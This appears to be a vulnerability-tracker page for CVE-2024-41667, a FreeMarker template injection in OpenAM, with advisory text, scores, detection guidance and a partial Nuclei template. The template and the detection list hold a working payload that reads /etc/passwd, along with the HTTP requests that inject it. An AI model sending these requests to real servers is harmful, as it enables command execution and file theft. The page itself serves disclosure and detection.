CVE-2024-41667
published 2024-07-24CVE-2024-41667: OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is…
PriorityP266high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
3.54%
87.8th percentile
OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input. Although the developer intended to implement a custom URL for handling login to override the default OpenAM login, they did not restrict the `CustomLoginUrlTemplate`, allowing it to be set freely. Commit fcb8432aa77d5b2e147624fe954cb150c568e0b8 introduces `TemplateClassResolver.SAFER_RESOLVER` to disable the resolution of commonly exploited classes in FreeMarker template injection. As of time of publication, this fix is expected to be part of version 15.0.4.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openidentityplatform | openam | < 15.0.4 | 15.0.4 |
Detection & IOCsextracted from sources · hover to see the quote
urlPOST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create
urlPUT /openam/json/realms/root/realm-config/services/oauth-oidc
url/openam/oauth2/realms/root/authorize
command${value("head -n 1 /etc/passwd")}
path/openam/json/realms/root/realm-config/services/oauth-oidc
- →Detect exploitation attempts by monitoring PUT requests to /openam/json/realms/root/realm-config/services/oauth-oidc containing 'customLoginUrlTemplate' with FreeMarker template injection payloads (e.g., ${value(...)}).
- →Successful exploitation can be confirmed by detecting 'root:x:0:0:' in the URL-decoded Location header of the OAuth2 authorize response, indicating /etc/passwd content leakage.
- →Monitor for the X-Requested-With: XMLHttpRequest header combined with Content-Type: application/json on requests to OpenAM OAuth2 provider configuration endpoints as part of the exploit chain.
- →The vulnerability resides in the getCustomLoginUrlTemplate method in RealmOAuth2ProviderSettings.java; alert on any FreeMarker template expression (${...}) set in the customLoginUrlTemplate field. ↗
- ·The fix (commit fcb8432aa77d5b2e147624fe954cb150c568e0b8) introduces TemplateClassResolver.SAFER_RESOLVER to restrict FreeMarker class resolution, but does NOT fully sandbox template injection — only commonly exploited classes are blocked. Custom payloads using non-blocked classes may still succeed. ↗
- ·The exploit requires the attacker to have sufficient privileges to set the CustomLoginUrlTemplate configuration value, as the developer did not restrict it from being freely set. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
OpenAM FreeMarker template injection
ghsa·2024-07-25
CVE-2024-41667 [HIGH] CWE-94 OpenAM FreeMarker template injection
OpenAM FreeMarker template injection
OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input. Although the developer intended to implement a custom URL for handling login to override the default PingOne Advanced Identity Cloud login page,they did not restrict the `CustomLoginUrlTemplate`, allowing it to be set freely. Commit fcb8432aa77d5b2e147624fe954cb150c568e0b8 introduces `TemplateClassResolver.SAFER_RESOLVER` to disable the resolution of commonly exploited classes in FreeMarker template injection. As of time of publication, this fix is expected to be part of version 15.0.4.
OSV
OpenAM FreeMarker template injection
osv·2024-07-25
CVE-2024-41667 [HIGH] OpenAM FreeMarker template injection
OpenAM FreeMarker template injection
OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input. Although the developer intended to implement a custom URL for handling login to override the default PingOne Advanced Identity Cloud login page,they did not restrict the `CustomLoginUrlTemplate`, allowing it to be set freely. Commit fcb8432aa77d5b2e147624fe954cb150c568e0b8 introduces `TemplateClassResolver.SAFER_RESOLVER` to disable the resolution of commonly exploited classes in FreeMarker template injection. As of time of publication, this fix is expected to be part of version 15.0.4.
No detection rules found.
Nuclei
OpenAM<=15.0.3 FreeMarker - Template Injection
nuclei·CVSS 8.8
CVE-2024-41667 [HIGH] OpenAM<=15.0.3 FreeMarker - Template Injection
OpenAMProfile was updated.'
- raw:
- |
POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Connection: keep-alive
{}
matchers:
- type: word
part: body
words:
- 'message'
- 'reason'
- 'code'
condition: and
- raw:
- |
PUT /openam/json/realms/root/realm-config/services/oauth-oidc HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/json
{"advancedOAuth2Config":{"customLoginUrlTemplate":"${value(\"head -n 1 /etc/passwd\")}"},"deviceCodeConfig":{"completionUrl":"","verificationUrl":"","devicePollInterval":5,"deviceCodeLifetime":300},"oidcSsoProviderEnabled":false,"_id":"","_type":{"_id":"oauth-oidc","name":"OAuth2 Provider","collection":fal
https://github.com/OpenIdentityPlatform/OpenAM/commit/fcb8432aa77d5b2e147624fe954cb150c568e0b8https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-7726-43hg-m23vhttps://github.com/OpenIdentityPlatform/OpenAM/commit/fcb8432aa77d5b2e147624fe954cb150c568e0b8https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-7726-43hg-m23v
2024-07-24
Published